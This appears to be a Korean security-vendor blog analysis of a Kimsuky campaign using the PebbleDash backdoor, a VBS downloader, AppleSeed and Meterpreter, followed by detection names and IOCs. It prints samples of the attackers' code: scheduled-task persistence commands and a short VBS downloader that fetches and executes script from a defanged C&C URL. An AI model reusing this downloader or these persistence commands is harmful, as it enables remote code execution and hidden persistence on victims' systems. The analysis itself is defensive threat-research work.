최근 ASEC 분석팀은 APT 공격을 시도하는 악성코드 동향을 지속적으로 파악하며 관련 내용을 공유하고 있다. 이번에 확인된 사례는 PebbleDash 백도어 악성코드를 이용한 공격 사례이며, 이외에도 AppleSeed, Meterpreter 및 추가적인 악성코드들의 로그를 확인할 수 있었다.
PebbleDash 백도어
공격자는 다음과 같은 스피어 피싱 메일을 전송하여 사용자로 하여금 첨부 파일로 보여지는 링크를 클릭하여 압축 파일을 다운로드 받고 실행하게 유도하였다.
첨부된 zip 압축 파일의 압축을 해제하면 다음과 같이 “준공계.pif” 파일을 확인할 수 있다. 이 악성코드는 실제 악성 행위를 담당하는 PebbleDash 백도어 악성코드를 드랍하는 드로퍼 악성코드이다.
드로퍼 악성코드는 PebbleDash를 “C:\ProgramData\thumbs.db.pif” 경로에 드랍 및 실행하며, 동시에 정상 PDF 문서 파일 “C:\ProgramData\준공계.pdf”을 드랍 및 실행하기 때문에 사용자는 PDF 문서 파일을 실행한 것으로 인지시킨다.
이렇게 스피어 피싱 메일의 첨부 파일을 통해 설치된 PebbleDash는 공격자의 명령을 받아 악성 행위를 수행할수 있는 백도어 악성코드이다. C&C 서버로부터 전달받아 수행 가능한 명령들로는 프로세스 및 파일 작업 그리고 파일 다운로드 및 업로드 기능 등이 있으며 이에 따라 공격자는 PebbleDash를 이용해 시스템에 대한 제어를 획득할 수 있다.
이번에 확인된 PebbleDash는 올해부터 확인되고 있던 형태와 전체적으로 유사하지만 다음과 같은 차이점도 존재한다. 먼저 과거에는 실행 경로에 system32 폴더를 생성한 후 smss.exe 이름으로 복사하여 재귀 실행했던 것과 달리, 현재 확인된 PebbleDash는 system32 폴더를 생성하는 것은 동일하지만 lsass.exe 이름으로 설치한다.
PebbleDash는 실행 시 인자를 필요로하는데, 2021년 기준 인자로 사용된 이력이 있던 문자열은 “zWbTLWgKymXMDwZ”, “MskulCxGMCgpGdM” 였으며, 이번에 확인된 PebbleDash는 “njXbxuRQyujZeUAGGYaH”를 인자로서 필요로 한다.
“njXbxuRQyujZeUAGGYaH”를 인자로 받아 실행될 경우 자신을 동일 경로의 \system32\lsass.exe 즉 C:\ProgramData\system32\lsass.exe 경로로 복사 및 실행하는데 이 때는 “iFfmHUtawXNNxTHEiAAN”와 최초 실행 프로그램 경로를 인자로 주어 실행하고 원본 파일을 자가 삭제한다. 결과적으로 감염된 시스템에서는 아래와 같은 프로세스를 확인할 수 있다.
VBS 악성코드
위에서 확인된 PebbleDash는 한가지 사례에 불과하며, 해당 시스템 및 연관 시스템들에서는 추가적인 악성코드를 확인할 수 있었다. 첫번째는 VBS 악성코드이다. Kimsuky 그룹은 AppleSeed를 설치할때 위의 드로퍼 악성코드와 유사한 pif 드로퍼 악성코드를 이용한다. PebbleDash를 설치한 pif 드로퍼는 정상 문서 파일을 보여주고 PebbleDash만 설치하였지만, 일반적으로 AppleSeed를 설치하는 pif 드로퍼는 VBS 악성코드를 설치하는 추가적인 행위를 수행한다.
VBS 악성코드에 대한 사항은 아래의 상세 분석 보고서에서도 확인할 수 있으며, 구체적으로 mshta.exe를 이용해 외부에서 vbs를 다운로드 받아 실행하는 기능을 한다. 이 과정을 통해 다운로드되어 실행되는 추가적인 VBS 스크립트는 정보 탈취 및 2개의 작업 스케줄러를 등록하는데, 이전 사례에서는 다음과 같은 명령이 사용되었다.
> cmd /c schtasks /Create /SC minute /MO 20 /TN GoogleCache /TR "wscript //e:vbscript
//b C:\ProgramData\Chrome\.NetFramework.xml" /f
> cmd /c schtasks /Create /SC minute /MO 1 /TN GoogleUpdate /TR "regsvr32 /s
C:\ProgramData\Chrome\update.cfg" /f이번에 확인된 감염 시스템에서는 pif 드로퍼를 확인할 수 없었지만, 위의 사례와 유사하게 다음과 같은 작업 스케줄러가 등록되어 있었다.
"wscript //e:vbscript //b C:\ProgramData\Chrome\.NetFramework.xml"
"regsvr32 /sC:\ProgramData\Microsoft\Windows\update.cfg"수집된 “.NetFramework.xml” 파일은 확장자가 xml이지만 실제로는 vbs 악성코드이다. “.NetFramework.xml”는 다음과 같이 간단한 스크립트인데 기능 상으로는 외부에서 추가 스크립트를 다운로드 받아 실행시키는 기능이 전부이다.
On Error Resume Next:
Set rudrbvikmeaaaoja = CreateObject("MSXML2.ServerXMLHTTP.6.0"):
rudrbvikmeaaaoja.open "POST", "hxxp://m.sharing.p-e[.]kr/index.php?query=me",
False:rudrbvikmeaaaoja.Send:Execute(rudrbvikmeaaaoja.responseText):분석 당시 기준으로 C&C 서버에서 다음과 같은 간단한 명령을 전달하였다. 하지만 작업 스케줄러에 등록되어 주기적으로 명령을 다운로드 받아 실행하기 때문에 공격자가 다른 명령을 전달할 경우 악의적인 추가 명령을 수행할 수 있다.
Set WShell=CreateObject("WScript.Shell"):retu=WShell.run("cmd /c taskkill /im mshta.exe /f" , 0 ,true)추가 로그
여기까지는 실제 확인된 파일들 위주로 분석을 진행하였다. VBS 악성코드는 AppleSeed를 설치하는 pif 드로퍼에 의해 설치되는데, 이에 따라 자사 ASD(AhnLab Smart Defense) 인프라 상에서도 AppleSeed의 로그를 확인할 수 있었다. 설치된 AppleSeed는 정상 소프트웨어 위장 경로에 설치되어 아래와 같은 커맨드 라인으로 실행되었다. 이러한 설치 경로는 AppleSeed의 대표적인 특징 중 하나이다.
regsvr32.exe /s "C:\ProgramData\Firmware\ESTsoft\Common\ESTCommon.dll"이외에도 AppleSeed 감염 시스템에 함께 설치되는 경향이 있는 메타스플로잇의 Meterpreter에 대한 로그도 확인되었다.
위에서는 확인된 악성코드들의 기능들을 간략하게 설명하였지만, 아래 블로그에서 각 악성코드들에 대한 상세한 분석 정보를 확인할 수 있다.
[파일 진단]
- 파일 진단
Dropper/Win.LightShell (2021.12.16.01)
Backdoor/Win.PebbleDash.R458675 (2021.12.16.00)
Downloader/VBS.Agent (2021.12.08.00) - 행위 진단
Execution/MDP.Wscript.M3817
[IOC 정보]
- PebbleDash Dropper MD5
269ded557281d38b5966d6227c757e92 - PebbleDash MD5
7211fed2e2ec624c87782926200d61fd - VBS Downloader MD5
71fe5695bd45b72a8bb864636d92944b
25f057bff7de9d3bc2fb325697c56334 - PebbleDash C&C
hxxp://tools.macbook.kro[.]kr/update.php - VBS Downloader C&C
hxxp://m.sharing.p-e[.]kr/index.php?query=me
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보